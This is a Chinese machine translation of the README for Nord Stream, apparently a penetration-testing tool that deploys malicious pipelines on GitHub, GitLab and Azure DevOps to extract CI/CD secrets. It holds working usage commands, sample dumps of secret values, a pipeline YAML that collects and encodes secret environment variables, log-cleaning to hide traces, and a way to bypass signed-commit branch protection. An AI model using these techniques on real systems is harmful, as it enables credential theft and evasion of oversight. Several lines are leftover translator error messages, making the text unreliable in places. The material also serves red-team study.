Nord Stream 是一款工具,允许你通过部署_恶意_流水线来提取存储在 CI/CD 环境中的机密。
它目前支持 Azure DevOps、GitHub 和 GitLab。
在以下博文中了解更多信息:https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks
$ pipx install git+https://github.com/synacktiv/nord-stream
`git` 也是必需的(参见 https://git-scm.com/download/),并且必须存在于你的 `PATH` 中。
## 用法
这里有一个简单的 GitHub 示例;首先,可以枚举各种秘密。```sh
$ nord-stream github --token "$GHP" --org org --list-secrets --repo repo
[*] Listing secrets:
[*] "org/repo" secrets
[*] Repo secrets:
- REPO_SECRET
- SUPER_SECRET
[*] PROD secrets:
- PROD_SECRET
然后继续进行数据外泄:```sh
$ nord-stream github --token "$GHP" --org org --repo repo
[+] "org/repo"
[] No branch protection rule found on "dev_remote_ea5Eu/test/v1" branch
[] Getting secrets from repo: "org/repo"
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_SUPER_SECRET=value for super secret
secret_REPO_SECRET=repository secret
[] Getting secrets from environment: "PROD" (org/repo) [] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Secrets: secret_PROD_SECRET=Value only accessible from prod environment
[] Cleaning logs. [] Check output: /home/hugov/Documents/pentest/RD/CICD/tools/nord-stream/nord-stream/nord-stream-logs/github
### 共享参数
某些参数在 [GitHub](#github)、[Azure DevOps](#azure-devops) 和 [GitLab](#gitlab) 之间是共享的,以下是一些示例。
#### 描述令牌
`--describe-token` 选项可用于显示有关你的令牌的常规信息:```bash
$ nord-stream github --token "$PAT" --describe-token
[*] Token information:
- Login: CICD
- IsAdmin: False
- Id: 1337
- Bio: None
--build-yaml 选项可用于创建流水线文件,而无需将其部署。它会检索各种密钥名称以构建关联的流水线,可用于添加自定义步骤:```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --env PROD --build-yaml custom.yml
[+] YAML file:
name: GitHub Actions
'on': push
jobs:
init:
runs-on: ubuntu-latest
steps:
- run: env -0 | awk -v RS='\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0
name: command
env:
secret_PROD_SECRET: ${{secrets.PROD_SECRET}}
environment: PROD
#### YAML
`--yaml` 选项可用于部署自定义流水线:```yml
name: GitHub Actions
'on': push
jobs:
init:
runs-on: ubuntu-latest
steps:
- run: echo "Hello from step 1"
name: step 1
- run: echo "Doing some important stuff here"
name: command
- run: echo "Hello from last step "
name: last step
I don't see any content to translate. The chunk appears to be empty. Please provide the actual text content for chunk 13.```bash $ nord-stream github --token "$PAT" --org Synacktiv --repo repo --yaml custom.yml [+] "synacktiv/repo" [] No branch protection rule found on "dev_remote_ea5Eu/test/v1"branch [] Running custom workflow: .../custom.yml [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Workflow output: 2023-07-18T20:08:33.0073670Z ##[group]Run echo "Doing some important stuff here" 2023-07-18T20:08:33.0074247Z echo "Doing some important stuff here" 2023-07-18T20:08:33.0136846Z shell: /usr/bin/bash -e {0} 2023-07-18T20:08:33.0137261Z ##[endgroup] 2023-07-18T20:08:33.0422019Z Doing some important stuff here
[] Cleaning logs. [] Check output: .../nord-stream-logs/github
默认情况下,它会显示 `init` 作业中名为 `command` 的任务的输出,但所有内容都存储在本地,并且可以手动访问:```bash
$ cat nord-stream-logs/github/synacktiv/repo/workflow_custom_2023-07-18_22-08-44/init/4_last\ step.txt
2023-07-18T20:08:33.0458509Z ##[group]Run echo "Hello from last step "
2023-07-18T20:08:33.0459084Z echo "Hello from last step "
2023-07-18T20:08:33.0511473Z shell: /usr/bin/bash -e {0}
2023-07-18T20:08:33.0511890Z ##[endgroup]
2023-07-18T20:08:33.0597853Z Hello from last step
默认情况下,Nord Stream 将根据您的权限尝试移除管道部署后留下的痕迹。若要保留痕迹,可使用 --no-clean 选项。这将保留管道日志,但仍会还原对仓库所做的更改。
请注意,对于 GitLab,某些痕迹无法删除。
仓库管理员可以强制要求在某个分支上对提交进行签名,以阻止所有未签名且未验证的提交。借助 Nord Stream,可以对提交进行签名以绕过此类保护。
首先在 SCM 平台上创建并导入您的 GPG 密钥。```sh $ gpg --full-generate-key $ gpg --armor --export F94496913C43EFC5 $ gpg --list-secret-keys --keyid-format=long sec dsa2048/F94496913C43EFC5 2023-07-18 [SC] [expires: 2023-07-23] Key fingerprint = B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5 uid [ultimate] test-gpg [email protected]
I notice the input content is missing — the message ends with "INPUT:" and no actual Markdown text follows. Please provide the chunk content so I can translate it.```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --key-id F94496913C43EFC5 --user test-gpg --email [email protected] --force
[*] Using branch: "main"
[+] "synacktiv/repo"
[*] Getting secrets from environment: "prod" (synacktiv/repo)
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_PROD_SECRET=my PROD_SECRET
I don't see any content to translate — the chunk text after "INPUT:" is empty. Please provide the actual Markdown content for chunk 21.```bash $ git verify-commit 00dcd856624bc9a41f8bd70662f0650839730973 gpg: Signature made Tue 18 Jul 2023 10:34:18 PM CEST gpg: using DSA key B1583F439899C5A3B74ED04BF94496913C43EFC5 gpg: Good signature from "test-gpg [email protected]" [ultimate] Primary key fingerprint: B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5
### Azure DevOps
Nord Stream 可以提取以下类型的机密:
- 变量组 (vg)
- 安全文件 (sf)
- 服务连接
#### 服务连接
Azure DevOps 提供了创建与外部和远程服务连接的功能,以便在作业中执行任务。为此,需要使用服务连接。服务连接保存了到远程服务的身份凭据。Azure DevOps 中有多种类型的服务连接。
Nord Stream 目前支持为以下类型的服务连接提取机密:
- AzureRM
- GitHub
- AWS
- SonarQube
- SSH
如果你遇到不支持的连接类型,请提交 issue 或发起 pull request :)
##### SSH
这种服务连接类型的提取实现起来非常痛苦。输出内容如下:```
hostname:::port:::user:::password:::privatekey
如果你想在自托管运行器上运行它,可以执行以下操作:```
$ nord-stream devops ... --build-yaml test.yml --build-type ssh
[+] YAML file:
trigger: none
pool:
vmImage: ubuntu-latest
steps:
然后,你需要:
1) 将 `vmImage: ubuntu-latest` 更改为 `name: 'Self-Hosted pool name'`
2) 在 `#FIXME` 占位符中添加服务连接的名称。
3) 使用以下命令部署管道:`--yaml test.yml`
如果你需要在 Windows 自托管运行器上运行此操作,请在 `generatePipelineForSSH` 方法中将 `_serviceConnectionTemplateSSH` 替换为 `_serviceConnectionTemplateSSHWindows`,然后执行之前描述的操作。